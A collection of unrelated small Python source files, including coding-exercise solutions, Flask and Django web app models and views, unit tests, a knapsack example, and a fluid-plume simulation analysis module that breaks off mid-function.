class Solution:
def subtractProductAndSum(self, n: int) -> int:
####################
# Solution 1
# t = n
# list_t = []
# list_t.append(t%10)
# t = int((t - list_t[-1])/10)
# while(t > 0):
# list_t.append(t%10)
# t = int((t - list_t[-1])/10)
# list_t = list_t[::-1]
# n_list = list_t
#####################
# Solution 2
n_str = str(n)
n_list = [int(i) for i in n_str]
p_n = 1
s_n = 0
for i in n_list:
p_n = p_n * i
s_n = s_n + i
return p_n - s_n
|
from rest_api.utils.base_blueprint import BaseBlueprint
from .controllers import CONTROLLERS
from .repositories import REPOSITORIES
from .urls import urls
class TaskBlueprint(BaseBlueprint):
_url_prefix = "/tasks"
_controllers = CONTROLLERS
_repositories = REPOSITORIES
_urls = urls
|
# -*- coding: utf-8 -*-
from flask import current_app
from werkzeug.security import generate_password_hash
from werkzeug.security import check_password_hash
from flask_login import UserMixin
from itsdangerous import (
TimedJSONWebSignatureSerializer as Serializer,
BadSignature,
SignatureExpired
)
from sql import db
from app.extensions import login_manager
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.BOOLEAN(), nullable=False, default=False, comment='账户是否已经确认')
def __init__(self, username):
self.username = username
self.confirmed = False
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def generate_reset_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'reset': self.id}).decode('utf-8')
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id}).decode('utf-8')
def confirmed(self, token):
'''确认账户
'''
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token.encode('utf-8'))
except:
return False
if data.get('confirm') != self.id:
return False
self.confirmed = True
db.session.add(self)
return True
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except SignatureExpired:
return None
except BadSignature:
return None
return User.query.get(data.get('id'))
def __repr__(self):
return f'<User {self.username}>'
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
|
from django.db import models
from django.urls import reverse
class Quiz(models.Model):
name = models.CharField(verbose_name="Название теста", max_length=255)
users_passed = models.ManyToManyField(verbose_name="Пользователи прошедшие тест", to='auth.User', blank=True)
def get_absolute_url(self):
return reverse('quiz:quiz_detail', args=(self.id,))
def get_user_tested_count(self):
return UserAnswer.objects.filter(answer__question__quiz=self).values_list('user_id').distinct().count()
def get_next_question(self, user, question=None):
question_qs = self.question_set.all() if question is None else self.question_set.filter(id__gt=question.id)
for q in question_qs:
if q.get_answer_status(user=user) == Question.NOT_ANSWERED:
return q
return None
def get_user_progress(self, user):
statuses = {
Question.NOT_ANSWERED: 0,
Question.RIGHT: 0,
Question.NOT_RIGHT: 0,
}
for question in self.question_set.all():
statuses[question.get_answer_status(user)] += 1
return statuses
def __str__(self):
return self.name
class Meta:
verbose_name = "Тест"
verbose_name_plural = "Тесты"
class Question(models.Model):
NOT_ANSWERED = 0
RIGHT = 1
NOT_RIGHT = 2
quiz = models.ForeignKey(verbose_name="Тест", to='Quiz', on_delete=models.CASCADE)
text = models.TextField(verbose_name="Текст вопроса")
def get_absolute_url(self):
return reverse('quiz:question_form', args=(self.id,))
def get_answer_status(self, user):
user_answers = set(self.answer_set.filter(useranswer__user=user).values_list('id', flat=True))
if len(user_answers) == 0:
return self.NOT_ANSWERED
right_answers = set(self.answer_set.filter(right=True).values_list('id', flat=True))
if user_answers == right_answers:
return self.RIGHT
return self.NOT_RIGHT
def get_percent_right_answers(self):
right_users = set(UserAnswer.objects.filter(answer__in=self.answer_set.filter(right=True))
.values_list('user_id', flat=True))
not_right_users = set(UserAnswer.objects.filter(answer__in=self.answer_set.filter(right=False))
.values_list('user_id', flat=True))
all_user_answers_count = len(right_users) + len(not_right_users)
right_user_answers_count = len(right_users - not_right_users)
if all_user_answers_count > 0:
return right_user_answers_count / (all_user_answers_count / 100)
return 0
def __str__(self):
return self.text
class Meta:
verbose_name = "Вопрос"
verbose_name_plural = "Вопросы"
class Answer(models.Model):
question = models.ForeignKey(verbose_name="Вопрос", to='Question', on_delete=models.CASCADE)
text = models.TextField(verbose_name="Текст ответа")
right = models.BooleanField(verbose_name="Правильный ответ", default=False)
users = models.ManyToManyField(verbose_name="Пользователи", to='auth.User', through='UserAnswer', blank=True)
def __str__(self):
return self.text
class Meta:
verbose_name = "Ответ"
verbose_name_plural = "Ответы"
class UserAnswer(models.Model):
user = models.ForeignKey(verbose_name="", to='auth.User', on_delete=models.CASCADE)
question = models.ForeignKey(verbose_name="", to='Question', on_delete=models.CASCADE)
answer = models.ForeignKey(verbose_name="", to='Answer', on_delete=models.CASCADE)
class Meta:
verbose_name = "Ответ пользователя"
verbose_name_plural = "Ответы пользователей"
|
"""
Attack methods
"""
from .base import Attack
from .deepfool import DeepFoolAttack
from .gradientsign import FGSM
from .gradientsign import GradientSignAttack
from .iterator_gradientsign import IFGSM
from .iterator_gradientsign import IteratorGradientSignAttack
|
sum_value = 0
for num in range(1, 101):
sum_value = sum_value + num
print ("1부터 100까지 더한 값 =",sum_value)
sum_value = 0
for num in range(2, 101, 2):
sum_value += num # sum_value = sum_value + num
print ("1부터 100까지 값들 중에서 짝수만 더한 값 =",sum_value)
|
class Solution(object):
def searchRange(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
left = 0
right = len(nums) - 1
def lower_bound(nums, target, left, right):
while left <= right:
mid = (right - left) / 2 + left
if nums[mid] < target:
left = mid + 1
else:
right = mid - 1
return left
def upper_bound(nums, target, left, right):
while left <= right:
mid = (right - left) / 2 + left
if nums[mid] > target:
right = mid - 1
else:
left = mid + 1
return right
lower = lower_bound(nums, target, left, right)
upper = upper_bound(nums, target, left, right)
if lower == len(nums) or nums[lower] != target:
return [-1, -1]
else:
return [lower, upper]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .forismatic_quotes import get_quote
from .time_utils import get_time, get_date, get_weekday
from .battary_status import is_battery_low
from .greeting import get_greeting
|
import tensorflow as tf
# placeHolder 란
# 마치 데이터베이스의 PreapreStatement처럼 질의문 ? 를 생각하면 된다.
# 사용자가 입력한값을 질의문에 대응시키기 위하여 ?를 대시하듯이
# 어떤 수식에 대응시키기 위한 변수의 틀을 미리 만들어 두는개념이다
# 예를 들어 다음의 수식을 보자
# a = [1,2,3]
# b = a*2
# b는 정해진 배열[1,2,3] * 2만 할줄 안다 마약 어떤요소의 배열이라도 연산시키고자 한다
# 위와 같이 값을 구체화 하지 않고 다만, 3개짜리 배열이다. 라고 틀을 만들어두면 어떤요소의 배열이라도 연산시킬 수 있다.
# 어떤 값이라도 담을 수 있는 정수형 3개을 담을 수 있는 placeHolder를 만들어요. placeHolder 명을 a라고 가정한다.
a = tf.placeholder(tf.int32,[3])
b = tf.constant(2)
x_op = a * b
# 수식을 실행시켜 / 먼저 tensor의 session을 얻어 와야한다.
sess = tf.Session()
# x_op를 실행하려한다. 결정되지않은값 플레이스홀더를 갖고 있기 때문에 반드시 값을 설정해주어야 한다.
r1 = sess.run(x_op, feed_dict={a:[1,2,3]})
print(r1)
r2 = sess.run(x_op, feed_dict={a:[5,3,1]})
print(r2)
row = [10,20,30]
r3 = sess.run(x_op,feed_dict={a:row})
print(r3)
|
from django.contrib import admin
from .models import CSgoUser, Gun
# Register your models here.
class CSgoUserAdmin(admin.ModelAdmin):
list_display = ('username', 'password',)
class GunAdmin(admin.ModelAdmin):
fieldsets = [
('枪名', {'fields': ['name']}),
('类别', {'fields': ['cate']}),
]
list_display = ('name', 'cate',)
list_filter = ['cate']
search_fields = ['gun']
admin.site.register(CSgoUser, CSgoUserAdmin)
admin.site.register(Gun, GunAdmin)
|
import sys
products = [
['A', 3, 2],
['B', 4, 3],
['C', 1, 2],
['D', 2, 3],
['E', 3, 6]
]
products = [
['A', 3000000000, 2],
['B', 4000000000, 3],
['C', 1000000000, 2],
['D', 2000000000, 3],
['E', 3000000000, 6]
]
MAX_WEIGHT = 10
MAX_WEIGHT = 10000000000
def dfs():
def _dfs(n, w):
if w > MAX_WEIGHT:
return -sys.maxint-1
if n >= len(products):
return 0
return max(_dfs(n+1, w),
_dfs(n+1, w+products[n][1]) + products[n][2])
return _dfs(0, 0)
def dfs_memo():
dp = [[-1]*(MAX_WEIGHT+1) for _ in range(6)]
def _dfs(n, w):
if w > MAX_WEIGHT:
return -sys.maxint-1
if n >= len(products):
return 0
if dp[n][w] < 0:
dp[n][w] = max(_dfs(n+1, w),
_dfs(n+1, w+products[n][1]) + products[n][2])
return dp[n][w]
return _dfs(0, 0)
def dfs_dp():
dp = [[0]*(MAX_WEIGHT+1) for _ in range(6)]
dp[0][0] = 0
ret = 0
p = products
for n in range(5):
for w in range(MAX_WEIGHT+1):
nw = w + p[n][1]
if nw <= MAX_WEIGHT:
dp[n+1][nw] = max(dp[n+1][nw], dp[n][w] + p[n][2])
ret = max(dp[n+1][nw], ret)
return ret
print dfs()
print dfs_memo()
print dfs_dp()
|
class Solution1:
def compress(self, chars):
"""
:type chars: List[str]
:rtype: int
"""
i = 1
j = 0
count = 1
res = []
while i < len(chars) + 1:
if i < len(chars) and chars[i] == chars[j]:
count += 1
i += 1
continue
res.append(chars[j])
if count > 1:
res.extend([ele for ele in str(count)])
count = 1
j = i
i += 1
chars[:len(res)] = res
return len(res)
class Solution2:
def compress(self, chars):
"""
:type chars: List[str]
:rtype: int
"""
i = 1
j = 0
count = 1
while i < len(chars) + 1:
if i < len(chars) and chars[i] == chars[j]:
count += 1
i += 1
continue
data = [chars[j]]
if count > 1:
data.extend([ele for ele in str(count)])
diff = len(chars[j:i]) - len(data)
chars[j:i] = data
i = i - diff
count = 1
j = i
i += 1
return len(chars)
class Solution:
def compress(self, chars):
"""
:type chars: List[str]
:rtype: int
"""
res, i = 0, 0
while i < len(chars):
current_char = chars[i]
count = 0
while i < len(chars) and chars[i] == current_char:
i += 1
count += 1
chars[res] = current_char
res += 1
if count > 1:
for char in str(count):
chars[res] = char
res += 1
return res
if __name__ == '__main__':
chars = ["a", "a", "b", "b", "c", "c", "c"]
res = Solution().compress(chars)
print(res)
assert res == 6
chars = ["a", "b", "b", "b", "c", "c", "c"]
res = Solution().compress(chars)
print(res)
assert res == 5
chars = ["a"]
res = Solution().compress(chars)
print(res)
assert res == 1
chars = ["a", "b", "b", "b", "b", "b", "b", "b", "b", "b", "b", "b", "b"]
res = Solution().compress(chars)
print(res)
assert res == 4
|
from info.modules.index import index_blue
from flask import render_template, current_app, session, request, jsonify, template_rendered
from info.models import User, News
from info import constants, response_code
@index_blue.route('/news_list')
def news_list():
"""主页新闻展示"""
# 接受参数
cid = request.args.get('cid', '1')
page = request.args.get('page')
per_page = request.args.get('per_page')
# 校验参数
try:
cid = int(cid)
page = int(page)
per_page = int(per_page)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=response_code.RET.PWDERR, errmsg="参数错误")
# 获取数据库新闻数据
if cid == 1:
try:
paginate = News.query.order_by(News.create_time.desc()).paginate(page, per_page, False)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg="查询新闻数据出错")
else:
try:
paginate = News.query.filter(News.category_id == cid).order_by(News.create_time.desc()).paginate(page,
per_page,
False)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg="查询新闻数据出错")
news_list = paginate.items
total_page = paginate.pages
current_page = paginate.page
news_dict_List = []
for news in news_list:
news_dict_List.append(news.to_basic_dict())
data = {
'news_dict_List': news_dict_List,
'total_page': total_page,
'current_page': current_page
}
return jsonify(errno=response_code.RET.OK, errmsg="OK", data=data)
@index_blue.route("/")
def index():
"""主页视图"""
# 显示登入信息
user_id = session.get('user_id', None)
user = None
User.avatar_url
if user_id:
try:
user = User.query.get(user_id)
except Exception as e:
current_app.logger.error(e)
# 获取新闻排行数据
news_clicks = None
try:
news_clicks = News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)
except Exception as e:
current_app.logger.error(e)
context = {
'user': user,
'news_clicks': news_clicks
}
return render_template('news/index.html', context=context)
@index_blue.route('/favicon.ico')
def favicon():
"""加载title图标视图"""
return current_app.send_static_file('news/favicon.ico')
|
import re
def test_cleanupline(self):
# Failure message:
x = "Really? This can't be true! 5.5% is too much (trust me)"
s1 = cleanupLine(x)
s2 = re.sub("[^a-zA-Z0-9']",' ', x)
self.assertEquals(s1, s2)
def test_countWords(self):
# Failure message:
x = "Hello my Friend hello my other friend2 i really like my friends"
dict = countWords(x)
self.assertEquals(dict['hello'], 2)
self.assertEquals(dict['my'], 3)
self.assertEquals(dict['like'], 1)
self.assertEquals(dict['friend2'], 1)
def test_countLetters(self):
# Failure message:
x = "Hello my Friend hello my other friend2 i really like my friends"
letters = countLetters(x)
self.assertEquals(letters['e'], 8)
self.assertEquals(letters['l'], 7)
self.assertEquals(letters['a'], 1)
self.assertEquals(letters['y'], 4)
def test_results(self):
# Failure message:
mine = [6209,1566,1205,302,132,334]
yours = results()
if mine == yours:
self.assertEquals(mine, yours)
else:
self.assertEquals("my number for e = 6209", "and for to=302")
|
# -*- coding: utf-8 -*-
"""
Test the GenSchema API.
Created on Sun Jul 10 14:32:01 2016
@author: Aaron Beckett
"""
import pytest
from ctip import GenSchema
def test_construction():
"""Test GenSchema constructor."""
gen = GenSchema()
assert gen.name is None
assert gen.schema == {}
gen = GenSchema("schema_name")
assert gen.name == "schema_name"
assert gen.schema == {}
def test_add_invalid_values():
"""Test error detection when adding variables and values to a schema."""
gen = GenSchema()
with pytest.raises(TypeError): gen.add_values([], 1)
with pytest.raises(TypeError): gen.add_values({}, 1)
with pytest.raises(TypeError): gen.add_values(set(), 1)
with pytest.raises(TypeError): gen.add_values((), 1)
with pytest.raises(TypeError): gen.add_values(1, [])
with pytest.raises(TypeError): gen.add_values(1, {})
with pytest.raises(TypeError): gen.add_values(1, set())
with pytest.raises(TypeError): gen.add_values(1, ())
with pytest.raises(TypeError): gen.add_values(1)
def test_add_values():
"""Test ability to add values to a variable's list of valid values."""
gen = GenSchema()
# Inital variable creation
gen.add_values("var1", 1, 2)
assert "var1" in gen.schema
assert gen.schema["var1"] == [(1,None), (2,None)]
# Add another value to an already created variable
gen.add_values("var1", 3)
assert gen.schema["var1"] == [(1,None), (2,None), (3,None)]
# Add multiple new values to an aready created variable
gen.add_values("var1", 4, 5, 6)
assert gen.schema["var1"] == [(1,None), (2,None), (3,None), (4,None), (5,None), (6,None)]
# Add a duplicate value to an already created variable
gen.add_values("var1", 2)
assert len(gen.schema["var1"]) == 6
# Add a new variable
gen.add_values("var2", 2, 3, 1, 1)
assert len(gen.schema) == 2
assert len(gen.schema["var1"]) == 6
assert len(gen.schema["var2"]) == 3
def test_add_dependency_to_non_existent_variable():
"""Ensure dependencies can't be added to variables that don't exist."""
gen = GenSchema()
with pytest.raises(KeyError):
gen.add_dependencies("var1", "val1", GenSchema())
def test_add_dependency_to_non_existent_value():
"""Ensure dependencies can't be added to values that don't exist."""
gen = GenSchema()
gen.add_values("var1", "val1")
with pytest.raises(ValueError):
gen.add_dependencies("var1", "val2", GenSchema())
def test_add_invalid_dependencies():
"""Test TypeError detection when adding dependencies to a schema."""
gen = GenSchema()
gen.add_values("var1", 1)
with pytest.raises(TypeError): gen.add_dependencies("var1", 1, 1)
with pytest.raises(TypeError): gen.add_dependencies("var1", 1, "bad")
with pytest.raises(TypeError): gen.add_dependencies("var1", 1, [])
with pytest.raises(TypeError): gen.add_dependencies("var1", 1, {})
with pytest.raises(TypeError): gen.add_dependencies("var1", 1, ())
with pytest.raises(TypeError): gen.add_dependencies("var1", 1, set())
with pytest.raises(TypeError): gen.add_dependencies("var1", 1)
def test_add_dependencies():
"""Test ability to tie a dependency to a specific value."""
gen = GenSchema()
# Add dependency to existing value of existing variable
gen.add_values("var1", "val1")
gen.add_dependencies("var1", "val1", GenSchema())
assert len(gen.schema["var1"]) == 1
binding = gen.schema["var1"][0]
assert binding[0] == "val1"
assert isinstance(binding[1], GenSchema)
# Add dependency to integer value
gen.add_values("var1", 1, 2)
dep1 = GenSchema()
dep1.add_values("one", 'a', 'b')
dep1.add_values("num", 11.1, 34.2)
with pytest.raises(ValueError):
gen.add_dependencies("var1", "2", dep1)
gen.add_dependencies("var1", 2, dep1)
assert isinstance(gen.schema["var1"][2][1], GenSchema)
assert len(gen.schema["var1"][2][1].schema) == 2
# Add another dependency to the same arg
dep2 = GenSchema()
dep2.add_values("two", 100, 200)
gen.add_dependencies("var1", 2, dep2)
assert isinstance(gen.schema["var1"][2][1], GenSchema)
assert len(gen.schema["var1"][2][1].schema) == 3
# Add multiple dependencies to same value
gen.add_values("var2", 1, 3, 2)
gen.add_dependencies("var2", 3, dep1, dep2)
assert len(gen.schema["var2"]) == 3
binding = gen.schema["var2"][1]
assert binding[0] == 3
assert isinstance(binding[1], GenSchema)
assert len(binding[1].schema) == 3
|
from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_bcrypt import Bcrypt
from flask_moment import Moment
from flask_login import LoginManager
from flask_mail import Mail
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
bcrypt = Bcrypt(app)
login_manager = LoginManager(app)
login_manager.login_view = 'login'
login_manager.login_message_category = 'info'
mail = Mail(app)
moment = Moment(app)
from root import routes, models, errors
|
"""
The objective of this module is to average and integrate the variables of
interest and compute the terms in the kinetic and potential energy balance
equations, specifically for the forced plume experiment.
The main idea is to perform this operations without merging the subdmains that
are created from a simulation with several cores, in order to save memory.
In development. To do:
- Compute APE.
- ...
"""
from netCDF4 import Dataset
import numpy as np
import numpy.ma as ma
import pickle
from iosubdomains import Variable
class plume:
def __init__(self, folder_path, experiment_name):
self.path = folder_path
self.name = experiment_name
self.template = folder_path + experiment_name + '_%02i_hist.nc'
file = self.path + 'param.pkl'
self.time = Variable(self.template, 't')[:]
try:
with open(file, 'rb') as f:
self.params = pickle.load(f)
except:
print(f'There is no {file} file in folder.')
self.params['global_shape'] = (self.time.shape[0],
self.params['global_nz'],
self.params['global_ny'],
self.params['global_nx'])
self.params['dx'] = (self.params['Lx']/self.params['global_nx'])
self.params['dy'] = (self.params['Ly']/self.params['global_ny'])
self.params['dz'] = (self.params['Lz']/self.params['global_nz']) # just maintain a grid with the same dx in the three directions
def read_vars(self, vars):
"""
Read a list of variables from the paramters of the simulation
'NN' for Brunt-vaisala squared.
'KE' for Kinetic energy.
"""
fields = {}
for var in vars:
try:
fields[var] = Variable(self.template, var)[:]
except:
if var == 'NN':
fields[var] = self.brunt_vaisalla()
elif var == 'KE':
fields[var] = self.kinetic_energy()
elif var == 'Ep':
fields[var] = self.potential_energy()
elif var == 'none':
fields[var] = np.ones(self.params['global_shape'])
elif var == 'APE':
fields[var] = self.available_potential_energy()
elif var == 'Eb':
fields[var] = self.background_potential_energy()
elif var == 'test':
fields[var] = self.test()
elif var == 'p_mean':
fields[var] = self.mean_pressure()
elif var == 'Q_times_z':
fields[var] = self.E_2()
elif var == 'br_times_z':
fields[var] = self.E_1()
elif var == 'phi_z':
fields[var] = self.buoyancy_flux()
elif var == 'phi_b':
fields[var] = self.buoyancy_forcing()
elif var == 'pr':
fields[var] = self.backgroud_pressure()
if var == 'u':
fields[var] = fields[var]/self.params['dx']
elif var == 'v':
fields[var] = fields[var]/self.params['dy']
elif var == 'w':
fields[var] = fields[var]/self.params['dz']
return fields
def brunt_vaisalla(self):
f = self.read_vars(['b','z'])
NN = np.diff(f['b'], axis=1)/np.diff(f['z'])[0]
return NN
def kinetic_energy(self):
f = self.read_vars(['u','v','w'])
u = velocity_interpolation(f['u'], axis=3)
v = velocity_interpolation(f['v'], axis=2)
w = velocity_interpolation(f['w'], axis=1)
KE = (f['u']**2 + f['v']**2 + f['w']**2)/2 #[L^2/T^2]
return KE
def potential_energy(self):
b = self.read_vars(['b'])['b']
z = self.read_vars(['z'])['z']
Ep = np.zeros_like(b)
for z_i in range(len(z)):
Ep[:,z_i] = -b[:,z_i]*z[z_i]
return Ep
def available_potential_energy(self):
b = self.read_vars(['b'])['b']
br = b[0,:,0,0]
NN = (np.diff(br)/self.params['dz'])[0]
APE = np.zeros_like(b)
for z_i in range(len(br)):
APE[:,z_i,:,:] = (b[:,z_i,:,:] - br[z_i])**2/(2*NN) #[L^2/T^2]
return APE
def background_potential_energy(self):
b = self.read_vars(['b'])['b']
Eb = -b*z_r(b) #[L^2/T^2]
return Eb
def backgroud_pressure(self):
b = self.read_vars(['b'])['b']
br = b[0]
dz = self.params['dz']
pr = np.zeros_like(b)
for t_i in range(pr.shape[0]):
pr[t_i] = -br*dz - br[0,0,0]*dz
return pr
def Q_flux(self):
"""
Bottom buondary (volumetric) heat flux. [L/T^2]
"""
fields = self.read_vars(['x','y','z'])
Z, Y, X = np.meshgrid(fields['z']/self.params['Lz'],
fields['y']/self.params['Ly'] - 0.5,
fields['x']/self.params['Lx'] - 0.5, indexing='ij')
r = np.sqrt(X**2 + Y**2)
r0 = 0.01
msk = 0.5*(1.-np.tanh(r/r0))
delta = 1/(self.params["global_nz"])
Q =1e-5*np.exp(-Z/delta)/delta*msk
return Q
def buoyancy_flux(self):
"""
E_a --ϕ_z--> E_k #[L/T][L/T^2] ~ [L^2 T^-3]
"""
b = self.read_vars(['b'])['b']
w = self.read_vars(['w'])['w']
w = velocity_interpolation(w, axis=1)
br = b[0,:,0,0]
#NN = (np.diff(br)/self.params['dz'])[0]
phi_z = np.zeros_like(b)
for z_i in range(len(br)):
phi_z[:,z_i,:,:] = w[:,z_i,:,:]*(b[:,z_i,:,:] - br[z_i])
return phi_z
def buoyancy_forcing(self):
"""
ϕ_b #[L^-1 T^-3][L/T^2][T^2] ~ [T^-3]
"""
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
b = self.read_vars(['b'])['b']
br = b[0,:,0,0]
NN = (np.diff(br)/self.params['dz'])[0]
Q = self.Q_flux()
phi_b2 = np.zeros_like(b)
for t_i in range(n_time):
#aux = np.zeros(len(br))
#print(aux.shape)
for z_i in range(len(br)):
phi_b2[t_i, z_i,:,:] = Q[z_i,:,:]*(b[t_i,z_i,:,:] - br[z_i])/NN
return phi_b2
def pressure_fluctuation(self):
p = self.read_vars(['p'])['p']
global_shape = self.params['global_shape']
#p_mean = np.zeros(global_shape[:2])
p_prime = np.zeros_like(p)
for t_i in range(global_shape[0]):
for z_i in range(global_shape[1]):
p_mean = np.mean(p[t_i,z_i])
p_prime[t_i, z_i, :, :] = p[t_i, z_i, :, :] - p_mean
return p_prime
def vertical_pressure_flux(self, r_lim, z_lim):
"""
ϕp = w'p'dxdy #[L/T][T^-2 L^-1][L^2] ~ [L^2 T^-3]
"""
global_shape = self.params['global_shape']
Lx = self.params['Lx']
Ly = self.params['Ly']
dx = self.params['dx']
dy = self.params['dy']
r_max = r_lim # as in forced_plume_nudging.py
z_max = z_lim
nz = global_shape[1]
new_nz = int(nz*z_lim)
budget = np.zeros(global_shape[0])
fields = self.read_vars(['x', 'y'])
X, Y = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(X**2 + Y**2)
mask = ma.masked_outside(r, 0, r_max)
p = self.read_vars(['p'])['p']
#p_prime = self.pressure_fluctuation()
w = self.read_vars(['w'])['w']
w = velocity_interpolation(w, axis=1)
# Lid_flux integrates the vertical velocity at the lid. if var='none'
# it multiplies an array of ones with w, instead of another varible.
w_mean = self.Lid_flux('none', r_lim, z_lim)
for t_i in range(global_shape[0]):
p_mean = np.mean(p[t_i,new_nz,:,:])
covar = (w[t_i,new_nz,:,:] - w_mean[t_i])*(p[t_i, new_nz, :, :] - p_mean)
lid = ma.masked_array(covar, mask.mask)
budget[t_i] = lid.sum()
return budget*dx*dy #dx is the computed from the Lx lenght
def E_1(self):
global_shape = self.params['global_shape']
z = self.read_vars(['z'])['z']
b = self.read_vars(['b'])['b']
br = b[0]
brz = np.zeros(global_shape)
for t_i in range(global_shape[0]):
for z_i in range(len(z)):
brz[t_i, z_i] = br[z_i]*z[z_i]
return brz
def E_2(self):
global_shape = self.params['global_shape']
z = self.read_vars(['z'])['z']
Q = self.Q_flux()
Qz0 = np.zeros(global_shape)
for t_i in range(global_shape[0]):
for z_i in range(len(z)):
Qz0[t_i, z_i] = Q[z_i]*z[z_i]
return Qz0
def test(self):
f = self.read_vars(['u'], file)
test_field = np.zeros_like(f['u']) # to verify the averaging
return test_field
def disk_average(self, var, r_lim):
"""
Computes the average in a horizontal disk, neglecting the sponge layers
in the borders, and not merging subfiles. Only works for horizontal
subdomains (so far).
var a variable in string format. It can be:
- a var in netCDF file. e.g. 'b', 'u', 'w', etc.
- 'NN' for squared Brunt-Vaisala freq.
- 'KE' for kinetic energy.
- The list will increase as it increases the number of functions.
"""
# change the mask for the one in Flux
npx = self.params['npx']
npy = self.params['npy']
npz = self.params['npz']
number_domains = npx*npy*npz # so far only works for number_domains<100
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
x0 = Lx/2 # center point in the x domain.
y0 = Ly/2 # center point in the y domain.
nz = self.params['nz']
if var == 'NN': # maybe interpolate is field...
nz = nz - 1
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
r_max = r_lim #0.45 # as in forced_plume_nudging.py
z_max = 0.95
means = np.zeros((n_time, nz))
fields = self.read_vars([var, 'x', 'y'])
if var in ['u', 'v', 'w']:
axis_vel = {'u': 3, 'v': 2, 'w':1}
fields[var] = velocity_interpolation(fields[var], axis=axis_vel[var])
XX, YY = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(XX**2 + YY**2)
mask = ma.masked_outside(r, 0, r_max)
#mask_2 = ma.masked_outside(ZZ, 0, z_max)
for t in range(n_time):
for z_lvl in range(nz):
field_new = ma.masked_array(fields[var][t, z_lvl, :, :], mask.mask)
means[t, z_lvl] = field_new.mean()
#means = means/number_domains
return means
def Flux(self, flux, r_lim, z_lim):
"""
Computes the the mass, momentum and buoyancy fluxes in a cildrical
control volume, defined by the nudging (the sponge layer) limits
flux - a string idicating the tipe of flux: "mass", "momentum" or
"buoyancy".
"""
if flux == 'mass':
set_integrand = lambda x: x
elif flux == 'momentum':
set_integrand = lambda x: x**2
elif flux == 'buoyancy':
b = self.read_vars(['b'])['b']
set_integrand = lambda x: x*b
npx = self.params['npx']
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
nz = self.params['nz']
dx = Lx/npx
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
r_max = r_lim # as in forced_plume_nudging.py
z_max = z_lim
new_nz = int(nz*z_lim)
flux = np.zeros(n_time)
fields = self.read_vars(['w', 'x', 'y', 'z'])
w = velocity_interpolation(fields['w'], axis=1)
XX, YY = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(XX**2 + YY**2)
mask_1 = ma.masked_outside(r, 0, r_max)
#mask_2 = ma.masked_outside(ZZ, 0, z_max)
# defining integrand
integrand = set_integrand(w)
for t in range(n_time):
aux = np.zeros(new_nz)
for z_i in range(new_nz):
field_new = ma.masked_array(integrand[t, z_i], mask_1.mask)
aux[z_i] = field_new.sum()
flux[t] = aux.sum()
return flux
def Flux_levels(self, flux, r_lim=0.45):
"""
Computes the the mass, momentum and buoyancy fluxes in a cildrical
control volume, defined by the nudging (the sponge layer) limits
flux - a string idicating the tipe of flux: "mass", "momentum" or
"buoyancy".
"""
if flux == 'mass':
set_integrand = lambda x: x
elif flux == 'momentum':
set_integrand = lambda x: x**2
elif flux == 'buoyancy':
b = self.read_vars(['b'])['b']
set_integrand = lambda x: x*b
npx = self.params['npx']
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
nz = self.params['nz']
dx = self.params['dx']
dy = self.params['dy']
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
r_max = r_lim # as in forced_plume_nudging.py
z_max = 0.95
flux = np.zeros((n_time, nz))
fields = self.read_vars(['w', 'x', 'y', 'z'])
w = velocity_interpolation(fields['w'], axis=1)
XX, YY = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(XX**2 + YY**2)
mask_1 = ma.masked_outside(r, 0, r_max)
#mask_2 = ma.masked_outside(ZZ, 0, z_max)
# defining integrand
integrand = set_integrand(w)
for t in range(n_time):
for z_i in range(nz):
field_new = ma.masked_array(integrand[t, z_i], mask_1.mask)
flux[t, z_i] = field_new.sum()
return flux
def Surface_flux(self, var, r_lim, z_lim):
"""
"""
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
nz = self.params['nz']
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
r_max = r_lim # as in forced_plume_nudging.py
z_max = z_lim
new_nz = int(nz*z_lim)
budget = np.zeros(n_time)
fields = self.read_vars([var, 'w', 'u', 'v', 'x', 'y'])
w = velocity_interpolation(fields['w'], axis=1)
v = velocity_interpolation(fields['v'], axis=2)
u = velocity_interpolation(fields['u'], axis=3)
X, Y = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(X**2 + Y**2)
mask = ma.masked_outside(r, 0, r_max)
m = mask.mask*1
mask_ring = np.roll(m, -1, axis=0) + np.roll(m, 1, axis=0)
mask_ring += np.roll(m, -1, axis=1) + np.roll(m, 1, axis=1)
